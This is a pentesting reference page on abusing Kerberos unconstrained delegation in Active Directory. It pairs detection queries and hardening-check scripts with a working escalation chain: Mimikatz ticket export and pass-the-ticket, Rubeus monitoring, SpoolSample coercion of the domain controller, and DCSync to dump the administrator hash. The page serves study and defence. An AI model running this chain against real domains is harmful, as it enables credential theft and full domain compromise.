Unconstrained delegation

More specifically, the domain controller places a copy of the user's TGT inside the service ticket. When the user presents that service ticket (TGS) to the server, the server opens the TGS and stores the user's TGT in LSASS memory for later use, which allows the server to impersonate the user to any other service. Obtaining such a ticket can lead to domain escalation, since it might belong to the machine account of a domain controller or to a high-privilege account such as a domain administrator. For a computer to authenticate on behalf of a user to other services (unconstrained delegation), two conditions must hold:

  1. The computer account has the TRUSTED_FOR_DELEGATION flag set in its User Account Control (UAC) flags.

  2. The user account does not have the NOT_DELEGATED flag set; by default, non-domain accounts have this flag.

Detecting

AD Module

Get-ADComputer -Filter {TrustedForDelegation -eq $true -and primarygroupid -eq 515} -Properties trustedfordelegation,serviceprincipalname,description

Other interesting properties that can be enumerated are:

  • TrustedToAuthForDelegation

  • msDS-AllowedToDelegateTo

  • PrincipalsAllowedToDelegateToAccount

Get-ADComputer "Hive" -Properties TrustedForDelegation, TrustedToAuthForDelegation, msDS-AllowedToDelegateTo, PrincipalsAllowedToDelegateToAccount

Powerview 3.0

Get-DomainComputer -Unconstrained
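The two UAC conditions and the delegation properties listed above can be checked in one sweep. The script below is an added example for this page, not PowerView or the page author's code; it assumes the RSAT ActiveDirectory module is loaded and that the caller can read computer objects in the domain. It evaluates the TRUSTED_FOR_DELEGATION bit (0x80000) directly, then falls back to the constrained and resource-based properties, and separates domain controllers (primaryGroupID 516, unconstrained by design) from the hosts that actually need review.

```powershell
# Added example (not from the original page): classify every computer account by
# delegation type using the same properties the page enumerates.
# Assumes: RSAT ActiveDirectory module, read access to the domain.
Import-Module ActiveDirectory

# userAccountControl bit values (ADS_USER_FLAG_ENUM)
$TRUSTED_FOR_DELEGATION = 0x80000    # condition 1: unconstrained delegation allowed
$NOT_DELEGATED          = 0x100000   # condition 2: "Account is sensitive and cannot be delegated"

function Get-DelegationType {
    param($Computer)
    $uac = [int]$Computer.userAccountControl
    if ($uac -band $TRUSTED_FOR_DELEGATION) { return 'Unconstrained' }
    if ($Computer.'msDS-AllowedToDelegateTo') {
        # TrustedToAuthForDelegation = protocol transition (any authentication method accepted)
        if ($Computer.TrustedToAuthForDelegation) { return 'Constrained (protocol transition)' }
        return 'Constrained (Kerberos only)'
    }
    if ($Computer.PrincipalsAllowedToDelegateToAccount) { return 'Resource-based constrained' }
    return 'None'
}

$computers = Get-ADComputer -Filter * -Properties userAccountControl, primaryGroupID,
    TrustedToAuthForDelegation, 'msDS-AllowedToDelegateTo',
    PrincipalsAllowedToDelegateToAccount, servicePrincipalName

$report = foreach ($c in $computers) {
    $type = Get-DelegationType $c
    if ($type -eq 'None') { continue }

    # Constrained: which SPNs this host may delegate to.
    # Resource-based: which principals may delegate to this host.
    $detail = switch -Wildcard ($type) {
        'Constrained*'    { @($c.'msDS-AllowedToDelegateTo') -join '; ' }
        'Resource-based*' { @($c.PrincipalsAllowedToDelegateToAccount) -join '; ' }
        default           { '' }
    }

    [PSCustomObject]@{
        Name       = $c.Name
        Delegation = $type
        IsDC       = ($c.primaryGroupID -eq 516)   # 516 = Domain Controllers, 515 = Domain Computers
        Detail     = $detail
        SPNs       = (@($c.servicePrincipalName) -join '; ')
    }
}

# Non-DC hosts with 'Unconstrained' are the findings; everything else is context.
$report | Sort-Object IsDC, Delegation, Name | Format-Table -AutoSize
```

Filtering on the UAC bit rather than on the TrustedForDelegation extended property gives the same answer as the Get-ADComputer one-liner above, but the bit value is what you need when querying through plain LDAP or another tool. The NOT_DELEGATED constant is defined here because it is condition 2 for the user side; it is checked against user objects, not computers.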

Exploiting

## We must trick or wait for a domain admin to connect a service on appsrv.
## Now, if the command is run again:
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

## The DA token could be reused:
Invoke-Mimikatz -Command '"kerberos::ptt C:\Users\appadmin\Documents\user1\[0;2ceb8b3]-2-0-60a10000-Administrator@krbtgtDOLLARCORP.MONEYCORP.LOCAL.kirbi"'

Force authentication

There are multiple protocols which can coerce the machine account of the domain controller to authenticate to other hosts in the domain, such as the printer bug (SpoolSample) and the Encrypting File System Remote Protocol (MS-EFSRPC). However, capturing the ticket of the machine account requires Rubeus to run in monitor mode.

Rubeus.exe monitor /monitorinterval:10 /targetuser:DC$ /nowrap

Execution of the printer bug will coerce the domain controller to authenticate with the workstation which is configured for unconstrained delegation.

SpoolSample.exe dc hive

The ticket granting ticket (TGT) of the domain controller machine account will be received and captured by Rubeus.

The ticket is printed in base64 format and therefore cannot be used directly. However, executing the command below from a PowerShell console will decode the ticket and write it to a file with the .kirbi extension.

[IO.File]::WriteAllBytes("C:\Users\pentestlab.PURPLE\Desktop\DC.kirbi", [Convert]::FromBase64String("[base64string]"))

Using Pass the Ticket within Mimikatz, the current user account gains high-privilege rights on the domain controller. This can be verified by using the DCSync technique to dump the NTLM hash of the domain admin account and obtaining command execution via pass the hash on the domain controller.

kerberos::ptt DC.kirbi
lsadump::dcsync /domain:purple.lab /user:Administrator
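The chain above depends on three things a defender controls: a non-DC host with unconstrained delegation, a coercion vector such as the Print Spooler running on the domain controller, and privileged accounts whose TGTs are allowed to be delegated. The script below is an added hardening check for this page, not the page author's or any tool's code; it assumes the RSAT ActiveDirectory module, Windows PowerShell 5.1 (for Get-Service -ComputerName), remote service-query rights on the DCs, and a domain at functional level 2012 R2 or later for the Protected Users group. Note that the DC$ machine account itself cannot carry the NOT_DELEGATED flag, so the coercion path is closed by removing unconstrained delegation from non-DC hosts and stopping the spooler, not by the account-level checks.

```powershell
# Added example (not from the original page): check the controls that break the
# unconstrained delegation + coercion chain.
# Assumes: RSAT ActiveDirectory module, Windows PowerShell 5.1, rights to query
# services on the DCs remotely, Protected Users group present (2012 R2+ domains).
Import-Module ActiveDirectory

# 1. Print Spooler on domain controllers. The printer bug needs MS-RPRN (Spooler)
#    reachable on the DC; 'Stopped' + 'Disabled' is the expected state.
$spoolerState = foreach ($dc in Get-ADDomainController -Filter *) {
    $svc = Get-Service -Name Spooler -ComputerName $dc.HostName -ErrorAction SilentlyContinue
    [PSCustomObject]@{
        DC        = $dc.HostName
        Spooler   = if ($null -eq $svc) { 'unreachable' } else { [string]$svc.Status }
        StartType = if ($null -eq $svc) { 'unreachable' } else { [string]$svc.StartType }
    }
}

# 2. Privileged accounts whose TGT would be cached on a delegating host.
#    Either the NOT_DELEGATED flag (AccountNotDelegated) or Protected Users
#    membership stops the KDC from placing a forwardable TGT in the service ticket.
$protectedDns = @(Get-ADGroupMember -Identity 'Protected Users' -Recursive -ErrorAction SilentlyContinue |
                  Select-Object -ExpandProperty DistinguishedName)

$privilegedGroups = 'Domain Admins', 'Enterprise Admins', 'Administrators'
$exposedAccounts = foreach ($group in $privilegedGroups) {
    Get-ADGroupMember -Identity $group -Recursive |
        Where-Object { $_.objectClass -eq 'user' } |
        Get-ADUser -Properties AccountNotDelegated |
        ForEach-Object {
            [PSCustomObject]@{
                Group            = $group
                User             = $_.SamAccountName
                SensitiveFlagSet = [bool]$_.AccountNotDelegated
                InProtectedUsers = ($protectedDns -contains $_.DistinguishedName)
            }
        } |
        Where-Object { -not $_.SensitiveFlagSet -and -not $_.InProtectedUsers }
}

"== Print Spooler state on domain controllers =="
$spoolerState | Format-Table -AutoSize

"== Privileged accounts that can still be delegated =="
$exposedAccounts | Sort-Object User -Unique | Format-Table -AutoSize
```

Run together with the enumeration query in the Detecting section: a host that appears there as non-DC 'Unconstrained', a DC whose spooler is 'Running', and a domain admin listed in the second table are the three conditions the exploitation section relies on, and each row is an action item (clear the flag, disable the service, mark the account sensitive or add it to Protected Users).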
